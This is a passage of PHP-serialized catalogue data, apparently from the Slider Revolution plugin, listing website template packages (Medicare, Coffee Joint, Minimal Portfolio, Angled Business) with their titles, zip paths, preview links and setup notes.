Choose\";s:5:\"alias\";s:18:\"medicare-whychoose\";s:3:\"zip\";s:28:\"packs/medicare-whychoose.zip\";s:3:\"uid\";s:32:\"6dad61c672127de9e35884caa45d49a0\";s:3:\"img\";s:29:\"medicare-whychoose/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:275;a:25:{s:2:\"id\";s:3:\"284\";s:5:\"title\";s:16:\"Medicare Contact\";s:5:\"alias\";s:16:\"medicare-contact\";s:3:\"zip\";s:26:\"packs/medicare-contact.zip\";s:3:\"uid\";s:32:\"89bc35ad8beb62a149c42262ae49a270\";s:3:\"img\";s:27:\"medicare-contact/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:276;a:25:{s:2:\"id\";s:3:\"285\";s:5:\"title\";s:15:\"Medicare Footer\";s:5:\"alias\";s:15:\"medicare-footer\";s:3:\"zip\";s:25:\"packs/medicare-footer.zip\";s:3:\"uid\";s:32:\"ccf63e5233b3d63009e5ee90db51b37b\";s:3:\"img\";s:26:\"medicare-footer/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:2:\"10\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:277;a:25:{s:2:\"id\";s:3:\"286\";s:5:\"title\";s:20:\"Coffee Joint Website\";s:5:\"alias\";s:20:\"coffee-joint-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:28:\"coffee-joint-website-package\";s:3:\"img\";s:27:\"packages/coffee_package.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:278;a:25:{s:2:\"id\";s:3:\"287\";s:5:\"title\";s:11:\"Coffee Menu\";s:5:\"alias\";s:11:\"coffee-menu\";s:3:\"zip\";s:21:\"packs/coffee-menu.zip\";s:3:\"uid\";s:32:\"81195cad7be3f5180a267b34ce8cf966\";s:3:\"img\";s:22:\"coffee-menu/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:279;a:25:{s:2:\"id\";s:3:\"288\";s:5:\"title\";s:13:\"Coffee Header\";s:5:\"alias\";s:13:\"coffee-header\";s:3:\"zip\";s:23:\"packs/coffee-header.zip\";s:3:\"uid\";s:32:\"5eed8adb9d3ae12168ad4735ac63eb20\";s:3:\"img\";s:24:\"coffee-header/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:280;a:25:{s:2:\"id\";s:3:\"289\";s:5:\"title\";s:17:\"Coffee Philosophy\";s:5:\"alias\";s:17:\"coffee-philosophy\";s:3:\"zip\";s:27:\"packs/coffee-philosophy.zip\";s:3:\"uid\";s:32:\"76b5ccae3fa87fd0f991b87e7ae71c27\";s:3:\"img\";s:28:\"coffee-philosophy/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:281;a:25:{s:2:\"id\";s:3:\"290\";s:5:\"title\";s:12:\"Coffee Carte\";s:5:\"alias\";s:12:\"coffee-carte\";s:3:\"zip\";s:22:\"packs/coffee-carte.zip\";s:3:\"uid\";s:32:\"470214ddd2cec585629fb79a0fd908d6\";s:3:\"img\";s:23:\"coffee-carte/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:282;a:25:{s:2:\"id\";s:3:\"291\";s:5:\"title\";s:13:\"Coffee Teaser\";s:5:\"alias\";s:13:\"coffee-teaser\";s:3:\"zip\";s:23:\"packs/coffee-teaser.zip\";s:3:\"uid\";s:32:\"2ed868896c92a7bfb6431803c79e8486\";s:3:\"img\";s:24:\"coffee-teaser/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:283;a:25:{s:2:\"id\";s:3:\"292\";s:5:\"title\";s:14:\"Coffee Find Us\";s:5:\"alias\";s:13:\"coffee-findus\";s:3:\"zip\";s:23:\"packs/coffee-findus.zip\";s:3:\"uid\";s:32:\"96d3784473dfa64bce9e1e4101919927\";s:3:\"img\";s:24:\"coffee-findus/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:284;a:25:{s:2:\"id\";s:3:\"293\";s:5:\"title\";s:13:\"Coffee Footer\";s:5:\"alias\";s:13:\"coffee-footer\";s:3:\"zip\";s:23:\"packs/coffee-footer.zip\";s:3:\"uid\";s:32:\"6027c25e87a5fe7fd8727a51c0967915\";s:3:\"img\";s:24:\"coffee-footer/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:285;a:25:{s:2:\"id\";s:3:\"294\";s:5:\"title\";s:17:\"Minimal Portfolio\";s:5:\"alias\";s:25:\"minimal-portfolio-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:25:\"minimal-portfolio-package\";s:3:\"img\";s:38:\"packages/minimal_portfolio_package.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/minimal-portfolio-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">The Minimal Portfolio template is a slide based website with additional modal detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Minimal Portfolio\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"19\";s:9:\"installed\";b:0;}i:286;a:25:{s:2:\"id\";s:3:\"295\";s:5:\"title\";s:17:\"Minimal Portfolio\";s:5:\"alias\";s:17:\"minimal-portfolio\";s:3:\"zip\";s:27:\"packs/minimal-portfolio.zip\";s:3:\"uid\";s:32:\"183b97b301d5ff0b171c067a87c8a3f5\";s:3:\"img\";s:28:\"minimal-portfolio/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/minimal-portfolio-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">The Minimal Portfolio template is a slide based website with additional modal detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Minimal Portfolio\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"19\";s:9:\"installed\";b:0;}i:287;a:25:{s:2:\"id\";s:3:\"296\";s:5:\"title\";s:23:\"Minimal Portfolio Modal\";s:5:\"alias\";s:23:\"minimal-portfolio-modal\";s:3:\"zip\";s:33:\"packs/minimal-portfolio-modal.zip\";s:3:\"uid\";s:32:\"6874e6cec3663670f209a8d8a4f26b16\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/minimal-portfolio-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">The Minimal Portfolio template is a slide based website with additional modal detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Minimal Portfolio\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"19\";s:9:\"installed\";b:0;}i:288;a:25:{s:2:\"id\";s:3:\"297\";s:5:\"title\";s:23:\"Angled Business Website\";s:5:\"alias\";s:23:\"angled-business-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:31:\"angled-business-website-package\";s:3:\"img\";s:27:\"packages/angled_package.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:289;a:25:{s:2:\"id\";s:3:\"298\";s:5:\"title\";s:11:\"Angled Menu\";s:5:\"alias\";s:11:\"angled-menu\";s:3:\"zip\";s:21:\"packs/angled-menu.zip\";s:3:\"uid\";s:32:\"2fe0c4682d1231ee3918be9e4fcb1837\";s:3:\"img\";s:22:\"angled-menu/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:290;a:25:{s:2:\"id\";s:3:\"299\";s:5:\"title\";s:13:\"Angled Header\";s:5:\"alias\";s:13:\"angled-header\";s:3:\"zip\";s:23:\"packs/angled-header.zip\";s:3:\"uid\";s:32:\"09462601d4edca8dff899de6f666dc47\";s:3:\"img\";s:24:\"angled-header/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:291;a:25:{s:2:\"id\";s:3:\"300\";s:5:\"title\";s:11:\"Angled News\";s:5:\"alias\";s:11:\"angled-news\";s:3:\"zip\";s:21:\"packs/angled-news.zip\";s:3:\"uid\";s:32:\"b315105763ed91214cb2f0ac12615729\";s:3:\"img\";s:22:\"angled-news/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:292;a:25:{s:2:\"id\";s:3:\"301\";s:5:\"title\";s:15:\"Angled 